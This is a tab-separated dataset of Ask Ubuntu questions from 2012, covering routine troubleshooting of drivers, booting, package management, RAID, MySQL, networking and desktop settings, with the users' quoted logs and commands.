206279	thunderbird 16.0.1 filling disk space	i 'm on ubuntu 12.04 with thunderbird 16.0.1 and kernel 3.6.0-030600rc4-generic . i used thunderbird for quite a while and never had any problems with it . but now it seems to fill up my disk space very fast : watch -n 1 df -h . so ubuntu started giving out warnings . first i removed some files but not much later it had filled up around 600 mb . it eats around 50 mb/min while i just download 10 emails or so via imap . this behaviour is new and seems to be some kind of bug . i do n't want to delete my old mails , so what else could i do ?
206280	boot screen appears to be asking a question but garbled	i 'm running 12.04 precise pangolin , kernel 3.2.0-32 w/ gnome 3.4.2 i perused the prior questions/answers and did not find exactly the same problem , i am concerned that autofsck , grub or some other critical event that needs some attention ? any idea on how to get my video clean during boot ? once i get past the boot screen the video driver/card , etc is performing beautifully ! here is a photo of the boot screen ; nvidia geforce card information ( lspci -vvv ) 01:00.0 vga compatible controller : nvidia corporation g72 [ geforce 7300 le ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : gateway 2000 device 3a07 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- [ disabled ] capabilities : kernel driver in use : nvidia kernel modules : nvidia_173 , nouveau , nvidiafb thanks for your help/advice .
206283	how can i uninstall a nvidia driver completely ?	as expected , nvidia drivers have reduced my customizations . i ca n't login to unity 3d session . i ca n't find any content to help me to uninstall the driver and i do n't know what to do as i have never uninstalled them before .
206287	mount / in wine as /	now , wine mounts / folder as z : drive , and in winecfg i can change it to another letter , but i need to mount it as is / to / . ( this behaviour was on other version of wine , i dont remember which ) . this way i want to achieve launch of winebrowser to open native application associated with file . i checked - if path started with / it works , but if root folder mounted as disk , winebrowser does n't recognize this path and does nothing .
206288	how can i get the amd driver running on ubuntu 12.10 ( amd radeon hd 7310 & amd vision e1-1200 apu )	i installed ubuntu 12.10 on the lenovo s206 of my brother and already spent hours on trying to get the graphic driver to work . no matter which solution i used , in the end unity crashes , after the login i can see files on the desktop and also open folders and so on , but there is neither a window manager nor any sign of unity ( no panel on the top , no sidebar ) . i used this instruction to install the driver and i also tried generating distribution-specific packages . my brother wants to go to france in two days , i hope you can help me out .
206299	mysqld wo n't start after reboot	nothing in /var/log/mysql* . syslog shows : oct 25 09:55:28 mx mysqld : innodb : progress in percents : 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 14:55:28 utc - mysqld got signal 11 ; oct 25 09:55:28 mx mysqld : this could be because you hit a bug . it is also possible that this binary oct 25 09:55:28 mx mysqld : or one of the libraries it was linked against is corrupt , improperly built , oct 25 09:55:28 mx mysqld : or misconfigured . this error can also be caused by malfunctioning hardware . oct 25 09:55:28 mx mysqld : we will try our best to scrape up some info that will hopefully help oct 25 09:55:28 mx mysqld : diagnose the problem , but since we have already crashed , oct 25 09:55:28 mx mysqld : something is definitely wrong and this may fail . oct 25 09:55:28 mx mysqld : oct 25 09:55:28 mx mysqld : key_buffer_size=16777216 oct 25 09:55:28 mx mysqld : read_buffer_size=131072 oct 25 09:55:28 mx mysqld : max_used_connections=0 oct 25 09:55:28 mx mysqld : max_threads=800 oct 25 09:55:28 mx mysqld : thread_count=0 oct 25 09:55:28 mx mysqld : connection_count=0 oct 25 09:55:28 mx mysqld : it is possible that mysqld could use up to oct 25 09:55:28 mx mysqld : key_buffer_size + ( read_buffer_size + sort_buffer_size ) *max_threads = 1765459 k bytes of memory oct 25 09:55:28 mx mysqld : hope that 's ok ; if not , decrease some variables in the equation . oct 25 09:55:28 mx mysqld : oct 25 09:55:28 mx mysqld : thread pointer : 0x0 oct 25 09:55:28 mx mysqld : attempting backtrace . you can use the following information to find out oct 25 09:55:28 mx mysqld : where mysqld died . if you see no messages after this , something went oct 25 09:55:28 mx mysqld : terribly wrong ... oct 25 09:55:28 mx mysqld : stack_bottom = 0 thread_stack 0x30000 oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( my_print_stacktrace+0x29 ) [ 0x7ff147039689 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( handle_fatal_signal+0x483 ) [ 0x7ff146e4da53 ] oct 25 09:55:28 mx mysqld : /lib/libpthread.so.0 ( +0xeff0 ) [ 0x7ff14659fff0 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( page_cur_insert_rec_low+0x288 ) [ 0x7ff146f6c4b8 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( page_cur_parse_insert_rec+0x4fb ) [ 0x7ff146f6d07b ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( +0x58a6cd ) [ 0x7ff146f576cd ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( recv_recover_page+0x4a7 ) [ 0x7ff146f5bfc7 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( buf_page_io_complete+0x468 ) [ 0x7ff146f147d8 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( fil_aio_wait+0x122 ) [ 0x7ff146f2ed82 ] oct 25 09:55:28 mx mysqld : /usr/sbin/mysqld ( +0x5d2230 ) [ 0x7ff146f9f230 ] oct 25 09:55:28 mx mysqld : /lib/libpthread.so.0 ( +0x68ca ) [ 0x7ff1465978ca ] oct 25 09:55:28 mx mysqld : /lib/libc.so.6 ( clone+0x6d ) [ 0x7ff1450dfb6d ] oct 25 09:55:28 mx mysqld : the manual page at http : //dev.mysql.com/doc/mysql/en/crashing.html contains oct 25 09:55:28 mx mysqld : information that should help you find out what is causing the crash . is in syslog . everytime i try to restart mysqld i get failed .
206300	getting started with 12.04 lts problems	okay previously i used ubuntu 10.04 in desktops and loved it ! i bought a newer toshiba satellite with an i7 cpu , 8gb ram , 1tb hd , first thing i tried to do was install ubuntu 9 on it then i found out it was no longer supported . ( i gave my 10.04 disk away ) so i tried installing windows 7 and experienced so many problems , i am going back to try 12.04 . starting all over again . after installing 12.04 wireless was detected yet said it was disabled by a hardware switch . went read through the message boards found solution which was sudo rf kill all . okay all excited i would finally get my ubuntu to finally work i rushed back to my laptop from the internet cafe , and went looking for the terminal input on my ubuntu 12.04 , and i can not find the terminal . if i ca n't find the terminal how can i enter any sudo stuff ? so i guess the first question is where is the terminal located in 12.04 ? thank you .
206301	virtual hosts not working ( 12.10 )	i 'm trying to get virtual hosts up and running on my ubuntu laptop that has 12.10 installed . i 'm running apache2 , and i enabled the virtual hosting module . when i go to 12.0.0.1 , i 'm able to get the default page . when i go to example.local , i just get the search engine results , instead of the `` hey , you 're seeing this '' page i set up in that directory ( /var/www/example.local ) . i even made sure i have only one `` namevirtualhost *:80 '' variable active . checking error.log , nothing obvious seems to jump out as being amiss . here 's what i have in the respective files : example.local servername example.local serveradmin webmaster @ localhost documentroot /var/www/example.local < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/example.local > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined ports.conf namevirtualhost *:80 listen 80 hosts 127.0.0.1 localhost 127.0.1.1 kitaigorod 127.0.0.1 example.local : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
206308	how to install vlc version 1.1.9 ?	i want to install older version of vlc ( 1.1.9 ) because of the sound bug in 2 . * which makes it unusable ( sound is distorted when the user sets the volume > 100 % and then you ca n't fix it anymore ) . i 've googled about the bug and found out that it 's being fixed , but i do n't want to install 2.0.4 , because it 's still a nightly build . the 2.0.3 version ( in repos ) has this bug . i tried with synaptic - > removed vlc 2.0.3 - > right_clicked vlc package - > properties - > versions , but there are no older versions . i 've found official source ( .tar.gz ) but i do n't want to compile it myself . i ca n't find any .deb files . so how do i do this ?
206323	convert a ( txt|srt ) document from western ( iso-8859-15 ) to utf-8	i am having problems with subtitles in my language . they are encoded as western ( iso-8859-15 ) and therefore some characters are not displayed correctly . i am tired of replacing manually using gedit and ctrl-h and then saving as utf-8 . how to automate this process ?
206325	how to re-add raid-10 dropped drive ?	i have a problem that i ca n't seem to solve . we have a ubuntu server setup with raid-10 and two of the drives dropped out of the array . when i try to re-add them using the following command : mdadm -- manage -- re-add /dev/md2 /dev/sdc1 i get the following error message : mdadm : can not open /dev/sdc1 : device or resource busy when i do a `` cat /proc/mdstat '' i get the following : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ r $ md2 : active raid10 sdb1 [ 0 ] sdd1 [ 3 ] 1953519872 blocks 64k chunks 2 near-copies [ 4/2 ] [ u__u ] md1 : active raid1 sda2 [ 0 ] sdc2 [ 1 ] 468853696 blocks [ 2/2 ] [ uu ] md0 : active raid1 sda1 [ 0 ] sdc1 [ 1 ] 19530688 blocks [ 2/2 ] [ uu ] unused devices : < none > when i run `` /sbin/mdadm -- detail /dev/md2 '' i get the following : /dev/md2 : version : 00.90 creation time : mon sep 5 23:41:13 2011 raid level : raid10 array size : 1953519872 ( 1863.02 gib 2000.40 gb ) used dev size : 976759936 ( 931.51 gib 1000.20 gb ) raid devices : 4 total devices : 2 preferred minor : 2 persistence : superblock is persistent update time : thu oct 25 09:25:08 2012 state : active , degraded active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 layout : near=2 , far=1 chunk size : 64k uuid : c6d87d27 : aeefcb2e : d4453e2e:0b7266cb events : 0.6688691 number major minor raiddevice state 0 8 17 0 active sync /dev/sdb1 1 0 0 1 removed 2 0 0 2 removed 3 8 49 3 active sync /dev/sdd1 output of df -h is : filesystem size used avail use % mounted on /dev/md1 441g 2.0g 416g 1 % / none 32g 236k 32g 1 % /dev tmpfs 32g 0 32g 0 % /dev/shm none 32g 112k 32g 1 % /var/run none 32g 0 32g 0 % /var/lock none 32g 0 32g 0 % /lib/init/rw tmpfs 64g 215m 63g 1 % /mnt/vmware none 441g 2.0g 416g 1 % /var/lib/ureadahead/debugfs /dev/mapper/raid10vg-raid10lv 1.8t 139g 1.6t 8 % /mnt/raid10 when i do a `` fdisk -l '' i can see all the drives needed for the raid-10 . the raid-10 is part of the /dev/mapper , could that be the reason why the device is coming back as busy ? anyone have any suggestions on what i can try to get the drives back into the array ? any help would be greatly appreciated . thanks !
206329	how to have transmission in ubuntu 12.04 proxy the tracker requests ?	i cant find any settings in transmission preferences to proxy the tracker requests.i am behind a firewall and they block all known trackers like pirate bay.is there a way to install an older transmission release that had this option or is there a mirror of piratebay openbittorrent tracker that i can use ? i cant use any other torrent client like ktorrent because i need to use the transmission-rpc .
206331	how to enable the trim on transcend 320 ultra-fast 256gb ssd ?	i got a new ts256gssd320 , i 'd like to put on the trim . i have edited /etc/fstab with discard on the boot partition but the trim is still off .
206336	how di i fix this synaptic manager error	synaptic manager is giving me the following error : failed to fetch cdrom : //ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) /kubuntu/dists/natty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognised by apt . apt-get update can not be used to add new cd-roms failed to fetch cdrom : //ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) /kubuntu/dists/natty/restricted/binary-i386/packages please use apt- cdrom to make this cd-rom recognised by apt . apt-get update can not be used to add new cd-roms failed to fetch cdrom : //ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) /xubuntu/dists/natty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognised by apt . apt-get update can not be used to add new cd-roms failed to fetch cdrom : //ubuntu 11.04 _natty narwhal_ - release i386 ( 20110427.1 ) /xubuntu/dists/natty/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognised by apt . apt-get update can not be used to add new cd-roms
206339	some libre office menu items are always hidden	in libreoffice , why ca n't you open the full menu list ? always looks like this : but i want to see the full list of menu items , without having to scroll down to reach the bottom items .
206340	buttons in nautilus to toggle sidebar and view	is there a way to add buttons to nautilus ? i really would like to have a small button on the sidebar allowing to quickly switch between tree view and places view . also i would love to have buttons to change the file view ( icons , list , compact ) and size . using the menu is long-winded especially for the sidebar , and hotkeys like here are not helping at all when using the mouse one-handed .
206344	how to type all the math , stat , greek , equations efficiently in libreoffice ?	i am preparing a report related to physics which is full of greek , stat and calculus things , i know there is this question how to insert a greek symbol , but my problem is i cant fiddle with a drop down/ scroll list for for every symbol ( my paper in full of those ) , is there a way to do something with my keyboard layout , and turn it into something like the one tony stark uses in ironman ( i am not kidding please ) . i am literally tired for this fiddle-work for half of the day and have completed just 2 sheets , hmmm .
206351	no sound on asus 1225c notebook with pre-installed 12.04 lts	sound works fine on first operation . however , after doing a complete update sound is lost . solutions presented on ask ubuntu up to now do not work . only solution for the moment is to return to factory settings losing all personal files and downloaded updates . this `` no sound '' problem seems to be major . any ideas anyone ? your help would be much appreciated by thousands of users world-wide !
206352	setting appmenu_display_both for gtk3 applications does not work	to start the application with the menu enabled in the application and the panel , the following command has to be used : appmenu_display_both=1 appname i recently discovered that this only works for non-gtk3 applications in ubuntu 12.04 lts , i.e . if you replace appname with applications such as gnome-terminal , gedit , evince , empathy , evolution , rhythmbox , nautilus , etc . only global menus will be displayed . however , if you start , for example , gimp or inkscape by using appmenu_display_both , both global and local menus will be shown . the questions is : why is appmenu_display_both not taken into account when starting such gnome applications ? p.s . i know how to disable global menus in order to get the local ones ( ubuntu_menuproxy trick , removing appmenu-gtk/qt packages , removing the indicator-appmenu , etc . ) thanks for the help !
206359	successful boot , but no video output	ok , just installed ubuntu 12.10 on an asus zenbook ux32a ( integrated graphics ) . on boot , screen goes black , and does n't come back on . however , the computer boots successfully and i hear the login sound . i can then log in successfully . if i now connect an external monitor the hdmi port , that monitor comes on and displays the desktop as though in dual-screen mode . if i go into the display settings , turn the internal monitor off , apply , then turn it back on , it starts working with proper dual-screening . if i pull out the hdmi cable , it still reverts back to single screen mode , with the internal monitor still on . i can suspend and resume , and it still works . however if i reboot , it stops working again . how can i make the configuration persist between boots ?
206360	lock ubuntu server 12.0.4	how do i lock ubuntu server screen without installing gnome screensaver ? i 'm running the server with only the console without desktop installed .
206361	upgrading to xubuntu 12.10 using a non-pea supported cpu	i have just been upgrading my xubuntu 12.04 system to xubuntu 12.10 . however i 've got several error message during the upgrading process . at the end i was left with two broken packages : linux-image-extra-3.5.0-17-generic and linux-image-generic . trying to reinstall them gives me the following error message : this kernel does not support a non-pae cpu . i have found the following posts : http : //www.mail-archive.com/ubuntu-bugs @ lists.ubuntu.com/msg3868794.html https : //lists.ubuntu.com/archives/ubuntu-devel/2012-may/035176.html do i understand them right that my cpu is not supported anymore ? is there any other way to fix this problem ? thanks
206364	what are the system requirements of ubuntu 12.10 ? can i install ubuntu on my system ?	i have 734 mb of ram . can i install ubuntu 12.10 ? could i have any problems ?
206365	nvidia optimus low-end graphics mode ?	i 've seen a lot of people in this situation , but every time the variables differ and so does the solution for it . i think i have everything installed correctly . i have nvidia geforce 540m with bumblebee drivers installed . what happens is , every two times when ubuntu starts it tells me it is running in low-end graphics mode . i say ok and it crashes at the next window . i just restart and it starts normally . i 've made : lspci -nn | grep '\ [ 030 [ 02 ] \ ] : and the answer was : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 3d controller [ 0302 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df4 ] ( rev ff )
206371	wordpress does not create directories ?	first i will just tell you how my wordpress hierarchy looks like : /var/www has all of the wordpress files , which is different from how it is normally set up as /var/www/wordpress ( symlinked to /usr/share/wordpress ) . so var/www contains all of the files that /usr/share/wordpress would have , and /usr/share/wordpress is symlinked to /var/www , with an extra /var/www/wordpress symlinked to /var/www to prevent possible compatibility issues . when uploading a file like a favicon or a .zip-ped theme , everything works fine , and when checking if the theme/favicon is uploaded , wordpress shows that it is , and points to a directory that it thinks that it had created , like http : /localhost/wp-content/uploads/2012/ ... , which it had not , because the uploads folder is empty ! and so there is a broken link on the internet and the theme is displayed but it has just plain text ( because it had reverted to a plain theme i think ) please help ! i am sorry for such a long post but this is really quite a troublesome problem . i have chowned /var/www and /usr/share/wordpress to www-data .
206374	stuck with grub rescue > console	here is the background of my issue : i just recently installed the latest version of ubuntu along side with windows 8 enterprise . however upon checking the disk size , it seems that some of the portions of the hd memory were gone so i decided to check the disk partition and have seen that is was being used by another file system . thinking that the ubuntu takes it boots stuff from my drive c : , i deleted that partition and formated so i can use it to store some movies , music etc . now , as i switch on my machine , i am stucked with : error : unknown filesystem grub rescue > i googled a lot and saw the following command which seems no to me like sudo , chainloader etc , all of these command only returns unknown command in the console . what i just wanted is to boot from my windows 8 os . just to add , i ca n't open the bios menu so i could choose what media to boot . as i open my machine it automatically takes me to grub rescue console . here are the thing i already have : ubuntu installation disk windows 8 system repair disk i just do n't know how to boot into these things . let me know what to do .
206377	ubuntu software center unable to install packages ?	there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . please report this error at http : //launchpad.net/aptdaemon/+filebug and retry . what do i have to do to fix it ?
206379	install eclipse	i am new at linux . i need to install eclipse on my pc but i have no idea how to do that . could somebody please help me ? ? here you can find the file i downloaded : http : //www.eclipse.org/downloads/download.php ? file=/technology/epp/downloads/release/juno/sr1/eclipse-cpp-juno-sr1-linux-gtk.tar.gz
206380	unable to connect filezilla to ubuntu ec2	i have a micro ubuntu instance on ec2 . i have done a passwd to set it to simple password . i have installed vsftpd on the ec2 instance . and imported the ec2 pem file via filezilla-settings-sftp , and configured vsftpd.conf with following listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem local_root=/home/ubuntu pasv_enable=yes pasv_max_port=12100 pasv_min_port=12000 port_enable=yes i am using username ubuntu , password that_i_set , port 21 . i get the following error error : critical error error : could not connect to server
206389	unable to make window transparent in ubuntu 12.10	i have recently upgraded from ubuntu 12.04 lts to 12.10 ( x64 ) . i used to have transparent window tittle bar using gconf-editor - > apps - > gwd . but in 12.10 editing the value is n't doing nothing . also in ccsm many plugins such as : opacity , brightness , saturation , desktop cube and rotate cube are all gone . i love that transparent look very much and i want to get it back in 12.10 . i 'm using nvidia 7200gs ; amd athlon 7750 ; 3gb ram . is there any way to get it working ?
206390	can i install ubuntu 12.10 in a intel atom pc ?	hi my question is : can i install ubuntu 12.10 in a asus eeepc that has got 1.66 ghz ( intel atom ) and 1 gb of ram ? thanks
206395	windows 7 hard drive crashed ; loaded ubuntu from usb , ca n't find files that were on win 7 desktop	i have hard drive that crashed and was running windows 7 . i have a new drive , but need to get vital data off of old drive . i was successful in making a usb start up with ubuntu . it loads up and the drive is mounted under devices . the problem is that the files i need to get off the drive were stored on the windows desktop and when i select the desktop folder , it is empty . i can see all the other software and programs that were stored on the drive , but not these files . any help ( in super simple terms , please ) is greatly appreciated . thanks ! karl
206396	dropbox is taking too much cpu time . how can i fix it ?	i recently noticed that dropbox is taking about 50-90 % of my cpu for more than just a few seconds sometimes - mostly when downloading/syncing many or large files . still , i guess that even when syncing a lot of data , there 's no reason to use that much cpu ( perhaps network or disk.. ) any ideas or suggestions ? how can i make dropbox use less cpu ? ( running on ubuntu 12.04 on lenovo x220 with ssd drive )
206397	uninstalling standard plugins on eclipse juno ( 4.2 )	in case someone else want 's to get rid of some plugins which are part of the default eclipse bundles : removing mylyn , m2eclipse and egit was not possible via `` eclipse installation details - > uninstall '' . the uninstall button is disabled for all plugins . perhaps `` standard '' plugins pre-bundled in the download bundle from eclipse.org can not be removed via the ui . if someone knows how it should be correctly done please share .
206402	video playing problem of epiphany browser on ubuntu 12	i am using ubuntu 12 and epiphany as browser but it does not play flash contents . i installed flash player from software center but still does not work . what else can i do to solve he problem ? any idea ?
206403	ubuntu ( quantal ) takes long time to shutdown	ubuntu 12.10 takes about 5 minutes to shutdown , how to fix this ?
206406	where did the volume slider go ?	i upgraded to 12.10 2 days ago and that time the volume slider in the sounds menu was perfectly present ! but the lst time i switched on the laptop , now its gone ! only `` volume '' can be seen written ! here is the screenshot- what do i do to bring the slider back ? : o
206407	how do i find out which version and derivative of ubuntu is right for my hardware in terms of minimal system requirements ?	for a given hardware configuration , how do i find out if ubuntu will run on it ? what considerations should i take into account when choosing an ubuntu version and flavour such as : xubuntu with a lighter desktop than the usual gnome and unity lubuntu with the even lighter lxde desktop obviously ubuntu does not run on some processor architectures . so how do i go about choosing the right version and derivate . how can i find out the minmal system requirements ?
206411	to which ppa does a package belong to ?	is there a command which returns the ppa which was used to install a certain package ? some command that searches a package in the ppa 's . i know that i could find this info out by looking into synaptic manager , and analysing the package info . but i would like a command for that . i use 12.04
206412	deleted files after installing ubuntu	i installed ubuntu on my laptop over the windows , i had 2 partitions on one hard disk . it seems like old partition is gone with all my files ( photos , music , etc. ) . how can i recover old files . files were n't on same partition as windows .
206414	when i type apt-get -f install , i get the error message	xserver-xorg-core ( 2:1.11.4-0ubuntu10.8 ) breaks xserver-xorg-video-5 and is installed . also i can not upgrade my software , it said that the package system is broken , with detail information : the following packages have unmet dependencies : xserver-xorg-core : depends : xserver-common ( > = 2:1.11.4-0ubuntu10.8 ) but 2:1.11.4-0ubuntu10.8 is installed when i issue sudo apt-get update , the output seems fine the source is（sorry the output has too many links that i can not post in）；http : //archive.ubuntu.com reading package lists ... done ====================== when i issue sudo apt-get dist-upgrade , the output is : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : xserver-xorg-core : breaks : xserver-xorg-video-5 e : unmet dependencies . try using -f. ================== when i issue 'sudo apt-get -f install ' , the output is : dpkg : dependency problems prevent configuration of xserver-xorg-video-radeon : xserver-xorg-core ( 2:1.11.4-0ubuntu10.8 ) breaks xserver-xorg-video-5 and is installed . xserver-xorg-video-radeon ( 1:6.12.1-0ubuntu2 ) provides xserver-xorg-video-5 . dpkg : error processing xserver-xorg-video-radeon ( -- configure ) : dependency problems leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : xserver-xorg-video-radeon e : sub-process /usr/bin/dpkg returned an error code ( 1 )
206416	ubuntu 12.10 not updating softwares	i upgraded my ubuntu 12.04 to 12.10 . since then i am not able to download the updates from the software updater . the error says `` no network connection '' but my internet is working fine . so i checked the details of the problem . it goes like this : w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . now i am a noob in all this , but anyone can clearly see that update manager is trying to download packages from precise pangolin but that is no longer my os . so please help fixing this .
206420	machine reboots while installing ubuntu desktop 12.10 on windows 7 platform from usb	i downloaded universal-usb-installer-1.9.1.4 and ubuntu desktop 12.10 yesterday . i used a blank 4gb pendrive and burned the ubuntu desktop 12.10 iso file on it using the universal-usb-installer . i have a windows 7 professional os running on 3gb ram ( intel core 2 duo processor ) . i have sufficient hard disk space on my c drive ( around 70-80gb free ) . so i thought that i should be able to install ubuntu easily . i went to my bios settings and changed the boot order and put the usb option at the top . and then i rebooted my machine . i get into the installer . i even get to the screen where you get to decide to install ubuntu within your windows . but as soon as i click continue on that screen , my machine reboots . and i can not understand why this should happen . i tried using a ubuntu desktop 12.04.01 iso file instead . i got the same results .
206427	purple screen at startup	i was originally running windows 7 ultimate x64 on a packard bell . i decided to install ubuntu 12.10 on my computer , used wubi , and got to the screen where i could choose the os . however , when i chose ubuntu , a purple screen pops up . the hard drive del blinks , stops , and then the caps lock blinks . and then , nothing happens . i try to use normal cd instead of wubi and i was able to mount the iso on a usb drive using universal usb installer . i can get to the screen where i choose the boot order , select the usb drive , and then i get to a screen where ubuntu seems to be 'loading ' ( purple with ubuntu logo and name in the middle ) . then , all of a sudden , i get a `` kernel panic - not syncing : fatal exception in interrupt '' error message . my specs : intel core 2 duo cpu t5850 @ 2.16 ghz / 4 gb of ram / packard bell computer from 2007 . / windows 7 ultimate x64 installed . what should i do ? i am not very good in computer sciences , i have tried ctrl+alt+t , and alt+f2 , but nothing works .
206428	ssh password entered too many times connection refused	i tried connecting to my new installed ubuntu 12 server via ssh and i was asked for my password . ( i had used `` myusername @ ipadress '' to connect ) after entering the right password a few times ( with no luck ; access denied ) i started getting an error directly telling me that the connection was refused without asking me for a password anymore . it seems like i have managed to blacklist myself . it has been like this for about 2 hours now , is there a quick solution for this ?
206429	google talk app specific passwords in empathy	i have been using app specific passwords in google for a while and recently upgraded to ubuntu 12.10 . since then , i have been unable to get empathy working with google talk . is there a way to get it working ? thanks !
206431	brightness resets to maximum after every reboot . need some help	i have a ux31-e asus zenbook running 12.04 until today when i tried 12.10 . i 've experienced this issue on both versions of ubuntu . i have tried turning the brightness down manually through the settings manager as well as trying to set it using my function keys . either way works fine while i 'm actively using the computer . after a reboot , my brightness is once again at maximum . additionally , the dim screen to save battery feature has actually been turning my brightness up . then when i begin using my computer again after it dims the brightness is at max .
206432	how can i write a shell script that will run at startup and introduce a delay in the start of an application	i have an application installed for my samsung np-rv509 installed that makes the fn keys work properly.. i figured it out that it is the reason behind almost 30sec xtra booting time ... so i was wondering if i could write a shell/python script ( actually i myself cant as i dont know shell/python prog ) that will introduce a delay may be using a loop or something and then start the above application ... i shall add this script in start up apps ... this will simulate the running of that program at startup but , delayed in actual ... so how can i achieve this ? ( help wth the code ) thankyou ! : )
206438	how to use pitivi to insert text in video ?	i have started using pitivi in my ubuntu 12.04 . now i am able to make or edit videos using it . can anyone tell me how i can insert text in videos using pitivi ? ( like the way title card comes in movies with different text transition effect )
206442	support for dell xps 15 and hdmi working on hybrid graphics ?	so there is a lot of buzz about hybrid graphics having a weak support . i 'm currently considering buying a new laptop . dell xps 15 caught my eye . i will use it for work as well so i will need a large monitor for it connected by hdmi . the question is : has someone got a dell xps 15 and can confirm that hybrid graphics support is working fine on 12.10 with no issues on the hdmi . i ask this because all the buzz about the subject stops on 12.04 - does this mean that it 's all ok now : ) ?
206448	how do i disable app menu in libreoffice ?	how to disable the app menu functionality ( `` global menu '' ) in libreoffice , ubuntu 12.10 ?
206449	git config global file - remove settings	the following command : $ git config -- global -- list gives me : user.name=test user user.name=gotqn i want to remove the first name . i refers to this article and do the following commands but without any result : git config -- global -- remove-section user.name='test user' git config -- global -- remove-section user.name= '' test user '' git config -- global -- remove-section user.name=test user git config -- global -- remove-section user.name git config -- global -- remove-section test user i am using ubuntu 12.04 and git version gives me git version 1.7.9.5 please , help on this , because i want to try to save my project using git , but do not want to exec the command with 'test user ' name .
206452	how do i maximize the ubuntu screen when it is a virtualbox guest ?	i am virtualbox on windows 7 . the vm has ubuntu32bit ( latest version ) running . i am unable to maximimze the ubuntu window . here 's a screen shot of what i see : please , please go easy on me ! i 'm a microsoft guy , and just started with linux .
206454	12.10 unity counter badges do n't appear	i upgraded to ubuntu 12.10 last night , and none of my programs are displaying the little number badges for unread messages anymore . affected programs include thunderbird and empathy . i 'm assuming this is a config issue or something . the problem is that i do n't even know what these things are called , so googling is showing me nothing .
206455	packaging with quickly and including extra files for application	i 'm writing simple application in python using quickly . now i want to include few extra text files ( templates ) to my application so i can access it when application is installed . i want to store it in ~/aplication_name/templates for instance . how could i do this ?
206457	how does ubuntu one upload music metadata changes ?	i 've been recently editing quite a lot of mp3 files , basically editing mp3 tags . i 've got all my music collection stored in ubuntu one , so any time i edit any songs , the changes get uploaded to the cloud . i was wondering , does u1 upload the whole music file when editing its metadata ( e.g . id3 tags ) , or is there a way in which it detects that this metadata has been changed and just a portion of the file is uploaded ?
206463	how can i return to an application in the background ?	i know that i can run an application in the background by putting an ampersand ( ' & ' ) behind the command . for instance : user @ ubuntu : ~ $ rtorrent & [ 1 ] 4618 starts rtorrent in the background . i 'd like to return to the backgrounded rtorrent to check whether my downloads are completed . how can i do that ?
206465	reverting 12.10 back to 12.04	i upgrade 12.04 to 12.10 through the upgrade manager ... i would like to revert back to the original 12.04 . is there any manner in which this can accomplished without losing all my accumulated files ?
206466	linking to the internet	i know nothing about computers . i 'm trying to link to my wireless and it is asking for ssid and bssid . what is this and where do i find it .
206467	authentication error when trying to upgrade from 11.10 to 12.04	i wrote : ~ $ do-release-upgrade and the system says : checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1551 kb ] fetched 1551 kb in 6s ( 167 kb/s ) extracting 'precise.tar.gz ' authenticate 'precise.tar.gz ' against 'precise.tar.gz.gpg ' exception from gpg : gnupg exited non-zero , with code 2 debug information : gpg : signature made thu 11 oct 2012 07:47:10 am eet using dsa key id 437d05b5 gpg : ca n't open `/etc/apt/trusted.gpg ' gpg : keydb_search failed : file open error gpg : ca n't check signature : public key not found authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . please help me !
206468	split/tile a3 ( landscape ) pdf to a4 ( portrait )	how can i easily convert/split/tile every page of an pdf file which is a3/landscape to a4/portrait ?
